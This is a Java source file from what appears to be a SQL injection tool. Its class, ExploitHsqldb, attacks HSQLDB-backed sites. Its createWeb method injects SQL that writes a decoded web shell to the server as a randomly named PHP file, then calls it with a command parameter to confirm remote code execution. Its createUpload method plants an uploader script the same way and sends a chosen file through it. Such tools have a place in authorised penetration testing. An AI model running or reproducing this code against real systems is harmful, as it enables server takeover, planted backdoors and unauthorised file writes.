View Javadoc
1   package com.jsql.model.accessible.vendor;
2   
3   import com.jsql.model.InjectionModel;
4   import com.jsql.model.accessible.DataAccess;
5   import com.jsql.model.accessible.ResourceAccess;
6   import com.jsql.model.accessible.vendor.hsqldb.ModelYamlHsqldb;
7   import com.jsql.model.bean.util.Interaction;
8   import com.jsql.model.bean.util.Request;
9   import com.jsql.model.exception.JSqlException;
10  import com.jsql.model.exception.JSqlRuntimeException;
11  import com.jsql.util.LogLevelUtil;
12  import com.jsql.util.StringUtil;
13  import org.apache.commons.lang3.RandomStringUtils;
14  import org.apache.commons.lang3.StringUtils;
15  import org.apache.logging.log4j.LogManager;
16  import org.apache.logging.log4j.Logger;
17  import org.yaml.snakeyaml.Yaml;
18  
19  import java.io.File;
20  import java.io.FileInputStream;
21  import java.io.IOException;
22  import java.io.InputStream;
23  import java.net.http.HttpResponse;
24  import java.util.function.BinaryOperator;
25  
26  public class ExploitHsqldb {
27  
28      /**
29       * Log4j logger sent to view.
30       */
31      private static final Logger LOGGER = LogManager.getRootLogger();
32      private final InjectionModel injectionModel;
33      private final ModelYamlHsqldb modelYaml;
34  
35      public ExploitHsqldb(InjectionModel injectionModel) {
36          this.injectionModel = injectionModel;
37          var yaml = new Yaml();
38          this.modelYaml = yaml.loadAs(
39              injectionModel.getMediatorVendor().getHsqldb().instance().getModelYaml().getResource().getExploit(),
40              ModelYamlHsqldb.class
41          );
42      }
43  
44      public String createWeb(String pathExploit, String urlExploit) {
45          LOGGER.log(LogLevelUtil.CONSOLE_DEFAULT, "RCE Web target requirements: stack query, web+db on same machine, jdbc bridge");
46  
47          String bodyExploit = StringUtil.base64Decode(
48                  this.injectionModel.getMediatorUtils().getPropertiesUtil().getProperty(ResourceAccess.EXPLOIT_DOT_WEB)
49              )
50              .replace(DataAccess.SHELL_LEAD, DataAccess.LEAD)
51              .replace(DataAccess.SHELL_TRAIL, DataAccess.TRAIL);
52  
53          var nameTable = RandomStringUtils.secure().nextAlphabetic(8);
54          var nameExploit = RandomStringUtils.secure().nextAlphabetic(8) +".php";
55          this.injectionModel.injectWithoutIndex(String.format(
56              this.modelYaml.getFile().getWrite(),
57              nameTable,
58              nameTable, bodyExploit.replace("'", "\""),
59              nameTable, pathExploit + nameExploit
60          ), ResourceAccess.TBL_CREATE);
61  
62          BinaryOperator<String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> {
63              String result = this.injectionModel.getResourceAccess().callCommand(
64                  urlSuccess +"?c="+ ResourceAccess.WEB_CONFIRM_CMD
65              );
66              if (!result.contains(ResourceAccess.WEB_CONFIRM_RESULT)) {
67                  LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "Exploit body not found");
68                  return StringUtils.EMPTY;
69              }
70              var request = new Request();
71              request.setMessage(Interaction.ADD_TAB_EXPLOIT_WEB);
72              request.setParameters(urlSuccess);
73              this.injectionModel.sendToViews(request);
74              return urlSuccess;
75          };
76  
77          return this.injectionModel.getResourceAccess().checkUrls(urlExploit, nameExploit, biFuncGetRequest);
78      }
79  
80      public void createUpload(String pathExploit, String urlExploit, File fileToUpload) {
81          String bodyExploit = StringUtil.base64Decode(
82                  this.injectionModel.getMediatorUtils().getPropertiesUtil().getProperty(ResourceAccess.EXPLOIT_DOT_UPL)
83              )
84              .replace(DataAccess.SHELL_LEAD, DataAccess.LEAD)
85              .replace(DataAccess.SHELL_TRAIL, DataAccess.TRAIL);
86  
87          var nameTable = RandomStringUtils.secure().nextAlphabetic(8);
88          var nameExploit = RandomStringUtils.secure().nextAlphabetic(8) +".php";
89          this.injectionModel.injectWithoutIndex(String.format(
90              this.modelYaml.getFile().getWrite(),
91              nameTable,
92              nameTable, bodyExploit.replace("'", "\""),
93              nameTable, pathExploit + nameExploit
94          ), ResourceAccess.TBL_CREATE);
95  
96          BinaryOperator<String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> {
97              try (InputStream streamToUpload = new FileInputStream(fileToUpload)) {
98                  HttpResponse<String> result = this.injectionModel.getResourceAccess().upload(fileToUpload, urlSuccess, streamToUpload);
99                  if (result.body().contains(DataAccess.LEAD +"y")) {
100                     LOGGER.log(LogLevelUtil.CONSOLE_SUCCESS, ResourceAccess.UPLOAD_SUCCESSFUL, pathExploit, fileToUpload.getName());
101                 } else {
102                     LOGGER.log(LogLevelUtil.CONSOLE_ERROR, ResourceAccess.UPLOAD_FAILURE, pathExploit, fileToUpload.getName());
103                 }
104             } catch (InterruptedException e) {
105                 LOGGER.log(LogLevelUtil.IGNORE, e, e);
106                 Thread.currentThread().interrupt();
107             } catch (IOException | JSqlException e) {
108                 throw new JSqlRuntimeException(e);
109             }
110             return urlSuccess;
111         };
112 
113         this.injectionModel.getResourceAccess().checkUrls(urlExploit, nameExploit, biFuncGetRequest);
114     }
115 
116     public ModelYamlHsqldb getModelYaml() {
117         return this.modelYaml;
118     }
119 }